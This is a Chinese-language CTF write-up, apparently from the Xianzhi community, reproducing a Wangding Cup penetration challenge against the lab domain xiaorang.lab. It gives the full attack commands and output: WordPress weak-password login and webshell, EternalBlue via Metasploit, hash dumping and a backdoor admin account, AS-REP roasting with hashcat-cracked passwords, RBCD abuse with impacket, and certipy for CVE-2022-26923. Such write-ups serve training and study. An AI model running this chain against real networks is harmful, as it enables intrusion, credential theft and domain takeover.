网鼎杯半决渗透赛复现分析-先知社区

拓扑图

网络拓扑结构如下：

设备名称	IP地址
WEB01	39.99.136.199 172.22.15.26
XR-WIN08	172.22.15.24
XR-0687	172.22.15.35
XR-DC01	172.22.15.13
XR-CA	172.22.15.48

外网打点

fscan扫端口

39.99.224.45:22 open
39.99.224.45:80 open
http://39.99.224.45       code:200 len:39962  title:XIAORANG.LAB

dirsearch扫描后台登录弱密码
admin/123456

在主题模板界面编辑webshell

蚁剑连接shell成功上线

http://39.99.131.228/wp-content/themes/twentytwentyone/404.php

内网渗透

先查看跳板机ip ：172.22.15.26
fscan扫C段

(icmp) Target 172.22.15.26    is alive
(icmp) Target 172.22.15.24    is alive
(icmp) Target 172.22.15.13    is alive
(icmp) Target 172.22.15.35    is alive
(icmp) Target 172.22.15.18    is alive
[*] Icmp alive hosts len is: 5
172.22.15.24:3306 open
172.22.15.18:445 open
172.22.15.35:445 open
172.22.15.13:445 open
172.22.15.24:445 open
172.22.15.18:139 open
172.22.15.35:139 open
172.22.15.13:139 open
172.22.15.24:139 open
172.22.15.13:135 open
172.22.15.18:135 open
172.22.15.35:135 open
172.22.15.24:135 open
172.22.15.18:80 open
172.22.15.24:80 open
172.22.15.26:80 open
172.22.15.26:22 open
172.22.15.13:88 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo 
[*]172.22.15.18
   [->]XR-CA
   [->]172.22.15.18
[*] NetInfo 
[*]172.22.15.24
   [->]XR-WIN08
   [->]172.22.15.24
[*] NetInfo 
[*]172.22.15.13
   [->]XR-DC01
   [->]172.22.15.13
[*] NetInfo 
[*]172.22.15.35
   [->]XR-0687
   [->]172.22.15.35
[*] NetBios 172.22.15.35    XIAORANG\XR-0687              
[*] NetBios 172.22.15.13    [+] DC:XR-DC01.xiaorang.lab          Windows Server 2016 Standard 14393
[*] OsInfo 172.22.15.13 (Windows Server 2016 Standard 14393)
[+] MS17-010 172.22.15.24       (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.15.18    XR-CA.xiaorang.lab                  Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.24    WORKGROUP\XR-WIN08                  Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.15.26       code:200 len:39962  title:XIAORANG.LAB
[*] WebTitle http://172.22.15.18       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.15.24       code:302 len:0      title:None 跳转url: http://172.22.15.24/www
[+] PocScan http://172.22.15.18 poc-yaml-active-directory-certsrv-detect 
[*] WebTitle http://172.22.15.24/www/sys/index.php code:200 len:135    title:None

简单总结如下

172.22.15.26  入口 已拿下
172.22.15.24  WORKGROUP\XR-WIN08          /www/sys/index.php        MS17 
172.22.15.13   DC:XR-DC01.xiaorang.lab          
172.22.15.35  XIAORANG\XR-0687 
172.22.15.18  XR-CA.xiaorang.lab  active-directory-certsrv-detect

永恒之蓝 172.22.15.24

接着使用msf挂代理打永恒之蓝

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.22.15.24
run

抓哈希

load kiwi
creds_all


Username   Domain     Password
--------   ------     --------
(null)     (null)     (null)
XR-WIN08$  WORKGROUP  (null)

kerberos credentials
====================

Username   Domain     Password
--------   ------     --------
(null)     (null)     (null)
xr-win08$  WORKGROUP  (null)

hashdump 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

zdoo

然后访问之前扫到的 http://172.22.15.24/www/sys/index.php
弱密码admin/123456登录没找到有用的东西

给win主机加个用户方便维持权限

load powershell
powershell_execute "net user qwq Qq123456. /add"
powershell_execute "net localgroup administrators qwq /add"

rdp登录看信息如果有报错，参考一下这个https://blog.csdn.net/juanjuan_01/article/details/127005255

看下phpstudy里面数据库的密码

root/root@#123
zdoo/zdoo123

导出用户信息和密码

AS-REP Roasting

Kerberos身份认证的第一个过程又被称为域身份验证，主要是为了防止与用户密码脱机爆破。如果与用户关闭了预身份验证（“Do not require Kerberos preauthentication”）的话，攻击者可以使用指定的用户向域控制器发送AS-REQ请求。然后域控制器会返回TGT票据和加密的Session-key等信息。因此攻击者就可以对获取到的加密Session-key进行离线破解，如果爆破成功，就能得到该指定用户的明文密码。这种攻击方式被称作AS-REP Roasting攻击。

先来尝试一下看有没有用户没有设置Kerberos 预身份认证

proxychains python3 GetNPUsers.py -dc-ip 172.22.15.13  -usersfile /home/kali/Desktop/user.txt  xiaorang.lab/

成功返回两个票据

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

$krb5asrep$23$lixiuying@XIAORANG.LAB:ed86f768287f6a44cbb2885c01f0ad42$a1ac3ad734454fee6acb5d25bf9f62af558b200f9d29dbe1dbc8a52d02d83795961c48d696a352957d28b59508da600a3e7e1b6f46fc7b1de1b87e5bc2f4b9c16879dffd43b3c23f95654fd180173b10ec149eab923e442160c09aae74bb4680d973d71e7b702b64b271b0c1c6e07d032b46b616a2c9c21e9aa4f5ef2e05e346a1e85e68bbe6916dcb7e8f74d01554b08e9fa903f9011164aac11e28edba78381da7803cc6f036b2225f443d494cb7fc8f1918ccaa623d22276f999a9241ec847a4e888bf9d30f7d33fe256d5a65c75a3c885e79e58073455a70d8aecf27622b253bcf2532b874f299947140
$krb5asrep$23$huachunmei@XIAORANG.LAB:e9cf18d1fffc5ee6d45b88701de41307$10908e99ec8685c3f0eb59be023d694dbc6011f09035e2742ed211f4d2af28a7182dfbe56c3d9ee50c4b16b21d8ee024d4922fbf2ccb80e3f5138a27d37760505d3bbf0309718201afaaa61db178b96a0f653f74b560e41b8d1e0133434b630c3b90ad625de7f3555074918def7be06cb0b98bf91614641d06ed4e9c256b8cfb1294a0ba20990aceacf2d73d45e81ad73ba23ddd8aa20a02cdce349058bbe7480784810394952be6f9cf8b015f7eeb8df1db679312f4eed2023d4f522ebca11222bd85382a368cbf9d03df90f7d7f0941b25d24c54b95350ca3d0f6604f461cba04899704797dc298961c7b0

hashcat爆破

hashcat -m 18200 --force -a 0 '$krb5asrep$23$huachunmei@XIAORANG.LAB:e9cf18d1fffc5ee6d45b88701de41307$10908e99ec8685c3f0eb59be023d694dbc6011f09035e2742ed211f4d2af28a7182dfbe56c3d9ee50c4b16b21d8ee024d4922fbf2ccb80e3f5138a27d37760505d3bbf0309718201afaaa61db178b96a0f653f74b560e41b8d1e0133434b630c3b90ad625de7f3555074918def7be06cb0b98bf91614641d06ed4e9c256b8cfb1294a0ba20990aceacf2d73d45e81ad73ba23ddd8aa20a02cdce349058bbe7480784810394952be6f9cf8b015f7eeb8df1db679312f4eed2023d4f522ebca11222bd85382a368cbf9d03df90f7d7f0941b25d24c54b95350ca3d0f6604f461cba04899704797dc298961c7b0' rockyou.txt

得到密码能够登录172.22.15.35 这台机子

lixiuying@XIAORANG.LAB     winniethepooh
huachunmei@XIAORANG.LAB  1qaz2wsx

RBCD（基于资源的约束委派）进行提权

bloodhound分析一下域环境

proxychains4 -q python3 bloodhound.py -u lixiuying -p winniethepooh -d xiaorang.lab -dc XR-DC01.xiaorang.lab -c all --dns-tcp -ns 172.22.15.13 --auth-method ntlm --zip

具有GenericWrite权限，能打RBCD

Adinfo_win.exe -d xiaorang.lab --dc 172.22.15.13 -u huachunmei -p  1qaz2wsx

添加一个机器账户：

proxychains4 -q impacket-addcomputer -computer-name 'EVILCOMPUTER$' -computer-pass '123@#ABC' -dc-host XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 "xiaorang.lab/lixiuying:winniethepooh"

配置 RBCD：

proxychains4 -q impacket-rbcd xiaorang.lab/lixiuying:winniethepooh -action write -delegate-from "EVILCOMPUTER$" -delegate-to "XR-0687$" -dc-ip 172.22.15.13

请求并冒充域管权限的服务票据：

proxychains4 -q impacket-getST xiaorang.lab/EVILCOMPUTER$:'123@#ABC' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

导入票据

export KRB5CCNAME=administrator.ccache

PTT 登录主机：接着使用生成的 Administrator.ccache 票据获取系统管理员权限

proxychains python3 psexec.py Administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13
或者
proxychains4 -q impacket-psexec 'xiaorang.lab/administrator@XR-0687.xiaorang.lab' -target-ip 172.22.15.35 -codec gbk -no-pass -k

收到一个shell

172.22.15.18 (XR-CA) 存在 CVE-2022-26923

之前fscan扫到了active-directory-certsrv-detect
查找证书服务器，并尝试查找可以利用的证书模板：

proxychains4 -q certipy find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout

添加成功说明漏洞存在，继续按流程走，申请证书模版，这里有点怪，第一次打完超时了，第二次打打出来了，和那个永恒之蓝一样，应该是环境的问题

proxychains certipy req -u 'TEST2$@xiaorang.lab' -p 'P@ssw0rd' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -template 'Machine'